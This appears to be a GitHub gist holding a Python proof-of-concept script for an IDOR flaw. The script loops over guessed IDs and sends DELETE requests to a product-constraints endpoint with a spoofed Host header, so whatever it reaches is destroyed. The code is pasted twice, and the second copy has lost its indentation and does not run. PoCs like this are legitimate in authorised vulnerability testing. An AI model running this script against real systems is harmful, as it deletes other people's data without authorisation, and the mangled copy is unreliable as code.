HouqiyuA/gist:7a8adb0795f35238765ac3c884d0c9f0

## gistfile1.txt

import requests
import sys

def test_idor_vulnerability(base_url):
    # Validate URL format
    if not base_url.startswith(('http://', 'https://')):
        base_url = f"http://{base_url}"

    # Test IDs to try (including the original 1 and some other numbers)
    test_ids = [1, 2, 123, 999, 1000]

    print(f"\n[*] Starting IDOR test against: {base_url}")

    for test_id in test_ids:
        url = f"{base_url}/products/aaa/constraints/{test_id}"
        headers = {
            "Accept": "application/json",
            "Host": "localhost:50100"
        }

        print(f"\n[+] Testing IDOR with ID: {test_id}")
        print(f"[*] Request: DELETE {url}")
        print("[*] Headers:", headers)

        try:
            response = requests.delete(url, headers=headers, timeout=10)

            print("\n[*] Response Status:", response.status_code, response.reason)
            print("[*] Response Headers:")
            for header, value in response.headers.items():
                print(f"    {header}: {value}")
            print("[*] Response Body:", response.text or "<Empty>")

            # # Check if the deletion was successful (204 or other 2xx status)
            # if response.status_code == 204:
            #     print("[!] Potential IDOR vulnerability found - successfully deleted resource with ID:", test_id)
            # elif 200 <= response.status_code < 300:
            #     print("[!] Potential IDOR vulnerability found - received successful response for ID:", test_id)
            # else:
            #     print("[.] No success with this ID")

        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed for ID {test_id}: {str(e)}")
        except Exception as e:
            print(f"[!] Unexpected error for ID {test_id}: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        base_url = sys.argv[1]
    else:
        # Default to the host from the API info if no argument provided
        base_url = "http://192.168.126.129:8080"
        print("[*] No URL provided, using default:", base_url)

    try:
        test_idor_vulnerability(base_url)
    except KeyboardInterrupt:
        print("\n[!] Test interrupted by user")
        sys.exit(0)
    except Exception as e:
        print("[!] Fatal error:", str(e))
        sys.exit(1)

	import requests
	import sys

	def test_idor_vulnerability(base_url):
	# Validate URL format
	if not base_url.startswith(('http://', 'https://')):
	base_url = f"http://{base_url}"

	# Test IDs to try (including the original 1 and some other numbers)
	test_ids = [1, 2, 123, 999, 1000]

	print(f"\n[*] Starting IDOR test against: {base_url}")

	for test_id in test_ids:
	url = f"{base_url}/products/aaa/constraints/{test_id}"
	headers = {
	"Accept": "application/json",
	"Host": "localhost:50100"
	}

	print(f"\n[+] Testing IDOR with ID: {test_id}")
	print(f"[*] Request: DELETE {url}")
	print("[*] Headers:", headers)

	try:
	response = requests.delete(url, headers=headers, timeout=10)

	print("\n[*] Response Status:", response.status_code, response.reason)
	print("[*] Response Headers:")
	for header, value in response.headers.items():
	print(f" {header}: {value}")
	print("[*] Response Body:", response.text or "<Empty>")

	# # Check if the deletion was successful (204 or other 2xx status)
	# if response.status_code == 204:
	# print("[!] Potential IDOR vulnerability found - successfully deleted resource with ID:", test_id)
	# elif 200 <= response.status_code < 300:
	# print("[!] Potential IDOR vulnerability found - received successful response for ID:", test_id)
	# else:
	# print("[.] No success with this ID")

	except requests.exceptions.RequestException as e:
	print(f"[!] Request failed for ID {test_id}: {str(e)}")
	except Exception as e:
	print(f"[!] Unexpected error for ID {test_id}: {str(e)}")

	if __name__ == "__main__":
	if len(sys.argv) > 1:
	base_url = sys.argv[1]
	else:
	# Default to the host from the API info if no argument provided
	base_url = "http://192.168.126.129:8080"
	print("[*] No URL provided, using default:", base_url)

	try:
	test_idor_vulnerability(base_url)
	except KeyboardInterrupt:
	print("\n[!] Test interrupted by user")
	sys.exit(0)
	except Exception as e:
	print("[!] Fatal error:", str(e))
	sys.exit(1)
No results found